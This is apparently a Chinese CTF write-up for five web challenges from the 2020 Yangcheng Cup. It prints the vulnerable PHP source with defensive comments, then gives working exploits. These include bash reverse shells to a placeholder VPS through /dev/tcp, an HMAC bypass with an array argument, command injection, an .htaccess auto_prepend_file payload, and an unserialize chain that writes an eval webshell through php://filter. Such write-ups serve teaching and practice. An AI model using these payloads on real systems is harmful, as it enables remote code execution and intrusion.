
2020羊城杯web-wp


1. easycon

直接蚁剑直连

将bbbbbbbbb.txt文件下载后,用base64解码后,转换为图片格式拿到flag.

2. Blackcat

有原题:https://www.securify.nl/blog/spot-the-bug-challenge-2018-warm-up

下载黑猫警长的mp3文件,发现源码

<?php
// Entry gate: both POST fields must be present and non-empty. Note that
// empty() also rejects the string "0", so that value can never pass.
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}

// HMAC key from the environment. getenv() returns false when the variable is
// unset, which hash_hmac() would coerce to an empty key rather than reject.
$clandestine = getenv("clandestine");

// Optional key derivation from a third, client-controlled field.
// RISK: a POST value can be an array ("White-cat-monitor[]=a"). hash_hmac()
// expects a string: on PHP 7 it returns false with a warning, on PHP 8 it
// throws a TypeError. On PHP 7 the secret key is therefore silently replaced
// by false, and every later HMAC is computed with a known key.
// MITIGATION: reject anything that is not a string (is_string()) before it
// reaches hash_hmac(), and fail closed if hash_hmac() does not return a string.
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


// Authentication tag over the command argument, keyed with $clandestine.
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

// RISK: `!==` on a client-supplied string is not a constant-time comparison.
// MITIGATION: check is_string($_POST['Black-Cat-Sheriff']) and then use
// hash_equals($hh, $_POST['Black-Cat-Sheriff']).
if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}
// RISK: the argument is concatenated straight into a shell command line, so
// whoever passes the tag check (or controls the key, see above) runs arbitrary
// shell commands. MITIGATION: escapeshellarg() each argument, or avoid the
// shell entirely with the array form of proc_open().
echo "nc".$_POST['One-ear'];
echo exec("nc".$_POST['One-ear']);

hash_hmac 这个函数在 data 参数传入数组时会返回 false(PHP 7 下伴随一条 warning;PHP 8 起改为直接抛出 TypeError,这个技巧也就不再适用)

于是 $clandestine = hash_hmac('sha256', 数组, $clandestine) 的结果变成 false。

这样一来 $hh = hash_hmac('sha256', $_POST['One-ear'], false),密钥不再依赖环境变量 clandestine。

payload:


<?php
// Writeup author's payload generator for the Blackcat source above: it prints
// the three POST fields that source reads. The server-side fix that makes this
// moot is to reject non-string POST values before hash_hmac() and to compare
// tags with hash_equals().
$cmd0=";bash -c 'bash -i >%26 /dev/tcp/vpsip/8888 0>%261'";;
//$cmd = ';cat flag.php';
$cmd = ";bash -c 'bash -i >& /dev/tcpvpsip/8888 0>&1'";
// Key is the literal false, which PHP's default (coercive) scalar handling
// turns into the empty string for hash_hmac().
$hmac = hash_hmac('sha256', $cmd, false);
echo "White-cat-monitor[]=a&One-ear=".$cmd0."&Black-Cat-Sheriff=".$hmac;
//White-cat-monitor[]=a&One-ear=;bash -c 'bash -i >%26 /dev/tcp/vps/8888 0>%261'&Black-Cat-Sheriff=7b274163fd3820243f8cd99e49e71735f9faec25bff2a96d6ff3b6aab7ab1310

3. easyphp2

任意文件读取,尝试读取GWHT.php源码

采用url二次编码绕过

payload:

http://183.129.189.60:10025/?file=php://filter/convert.b%25%36%31se64-encode/resource=GWHT.php

GWHT.php

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>

<style>

html,
body {
overflow: none;
max-height: 100vh;
}

</style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

<?php
// Cap run time so the exec() further down cannot tie up the worker for long.
ini_set('max_execution_time', 5);

// Access gate: the 'pass' cookie must equal the PASS environment variable.
// NOTE: $_COOKIE['pass'] is read without isset(), so a missing cookie raises
// a notice/warning first; the comparison still fails closed (null !== string).
// RISK: the expected value is a fixed string, and (as the writeup shows) it
// also appears in check.php, so the gate is only as secret as that file.
if ($_COOKIE['pass'] !== getenv('PASS')) {
// Sets the cookie to the literal 'PASS', not to the expected value.
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>

<h1>A Counter is here, but it has someting wrong</h1>

<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>

<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
// Denylist of a few shell metacharacters and encoder names. It blocks ';'
// but not the single quote that delimits the argument below, nor '&&', '|'
// or '$()', so it does not prevent leaving the quoted printf argument.
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
// RISK: $count is spliced into a shell command inside single quotes; a quote
// in the input closes the literal and the rest of the input runs as shell.
// MITIGATION: compute the length in PHP (strlen()) instead of shelling out,
// or at minimum wrap the value with escapeshellarg().
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>

</body>

</html>

审计代码发现,count 参数被直接拼接进 exec() 的命令里,可以借此反弹 shell,但前提是要知道 $_COOKIE['pass'] 对应的值

robots.txt提示有check.php

<?php
// Hard-coded cookie value, never used in this file. RISK: anyone who can
// read this file's source (the writeup does so via the arbitrary file read
// above) learns the value the GWHT.php gate checks. MITIGATION: keep such
// secrets out of web-reachable source, and do not advertise the file in
// robots.txt.
$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";

// NOTE: output has already been sent by the echo above, so without output
// buffering this header() call fails with "headers already sent" and no
// redirect happens.
header('Location: /');

得到要传入的cookie值

payload:

GET /GWHT.php?count=a%27%26%26bash+%2dc+%22bash+%2di+%3E%26+/dev/tcp/vpsip/8888+0%3E%261%22%27||GWHT.php HTTP/1.1
Host: 183.129.189.60:10025
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pass=GWHT
Connection: close

为了操作更直观,写了一个一句话木马上去

发现了flag的所在地,但是没有权限

需要用GWHT或者root用户的权限才行。

README文件中发现密码hash值

解出来得到GWHTCTF

4. easyphp

这是xnuca 2019的一道原题

 <?php
// Wipe every regular file except index.php before doing anything else.
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
// Without both parameters, show this file's own source and stop.
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
// Case-insensitive substring denylist over the content.
// RISK: a substring denylist can be defeated when the consumer of the file
// tolerates transformations the filter does not see (the writeup above splits
// a keyword with backslash-newline, which Apache's config parser joins back).
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
// Filename may contain only lowercase letters and dots: no path separators,
// but also no extension allowlist, so dotfiles such as ".htaccess" pass.
// MITIGATION: generate the name server-side with a fixed extension, write
// outside the web root, and set AllowOverride None so per-directory config
// files are ignored.
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
// Second wipe, identical to the first, immediately before the write.
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
// The suffix is appended after a newline, so it does not interfere with how
// the preceding content is interpreted by whatever later reads the file.
file_put_contents($filename, $content . "\nHello, world");
?>

在目录下,只有index.php能够作为php解析执行,于是我们可以写一个.htaccess让index.php自动包含执行代码。

payload:

?content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23<?php%20system('cat%20/fla'.'g');?>\&filename=.htaccess

5. easyser

robots.txt提示有star1.php文件。

通过 http 协议,向参数 path 传入下面这个地址:

http://127.0.0.1/sandbox/702pnnqtjj5fokihj14dn9ss7s/star1.php
 <?php
// Suppress all error output (hides notices/warnings that could leak paths).
error_reporting(0);
// Source disclosure gated on the peer address being loopback. NOTE: loose ==
// comparison. RISK: any feature that makes the server request itself (the
// writeup fetches this page through the `path` parameter) satisfies the
// check; a REMOTE_ADDR test is not an authentication mechanism.
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
// Literal stored here; whether it is the real flag cannot be told from this
// file alone (the class comment below points at flag.php).
$flag='{Trump_:"fake_news!"}';

class GWHT{
// Object whose hasaki() is called when this instance is used as a string.
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
// String conversion delegates to $hero->hasaki(). RISK: if an instance is
// ever reconstructed by unserialize() from untrusted data, $hero is chosen by
// the caller and can be any class in scope (Yongen, whose hasaki() writes a
// file). MITIGATION: never unserialize() untrusted input; use JSON, or at
// least pass ['allowed_classes' => false] or a strict allowlist.
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
// Destination path (or stream URL) passed to file_put_contents().
public $file;
// Body written after the die() stub.
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;

}
// Writes $text to $file behind a PHP die() prefix meant to make the result
// harmless when requested directly. RISK: the prefix is just bytes in the
// buffer; when $file is a php://filter URL the stream filters run over the
// whole buffer, so the prefix offers no protection (the payload below relies
// on exactly that). The @ also hides any write failure. MITIGATION: accept
// only plain paths under a fixed directory (reject any scheme), and do not
// let object state chosen by the client pick the destination.
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
    /** Fixed line returned by the default hero; the class carries no state. */
    private const LINE = "I'm the best happy windy man";

    public function hasaki(){
        return self::LINE;
    }
}

?>

看到这些类定义就知道,这里多半是反序列化的考点了

写文件时利用 php://filter 伪协议。

payload:

<?php
//error_reporting(0);
//if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
// highlight_file(__FILE__);
//}
//$flag='{Trump_:"fake_news!"}';

// Stripped copy of the challenge's GWHT: only the public property matters for
// serialization, so the constructor takes the hero directly and __toString()
// is left commented out.
class GWHT{
public $hero;
public function __construct($hero){
// $this->hero = new Yasuo;
$this->hero = $hero;
}
// public function __toString(){
// if (isset($this->hero)){
// return $this->hero->hasaki();
// }else{
// return "You don't look very happy";
// }
// }
}
// Stripped copy of the challenge's Yongen: the two public properties are all
// that serialize() needs, so the write logic is left commented out.
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;

}
// public function hasaki(){
/* $d = '<?php die("nononon");?>';*/
// $a= $d. $this->text;
// @file_put_contents($this-> file,$a);
// }
}
//class Yasuo{
// public function hasaki(){
// return "I'm the best happy windy man";
// }
//}
// Destination is a php://filter URL rather than a plain path; the filter
// chain is applied to everything hasaki() writes before it reaches
// reader.php. DEFENSE: reject any scheme in user-influenced file targets
// (allowlist a plain path under a fixed directory) and never unserialize()
// untrusted input.
$file = "php://filter/string.strip_tags|convert.base64-decode/resource=reader.php";
// Base64 body consumed by the convert.base64-decode filter above.
$text = "PD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7Pz4=";
$test = new Yongen($file,$text);
$tesg = new GWHT($test);
// URL-encode the serialized object graph so it can travel in a query string.
echo urlencode(serialize($tesg));
#O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A72%3A%22php%3A%2F%2Ffilter%2Fstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dreader.php%22%3Bs%3A4%3A%22text%22%3Bs%3A36%3A%22PD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7Pz4%3D%22%3B%7D%7D

?>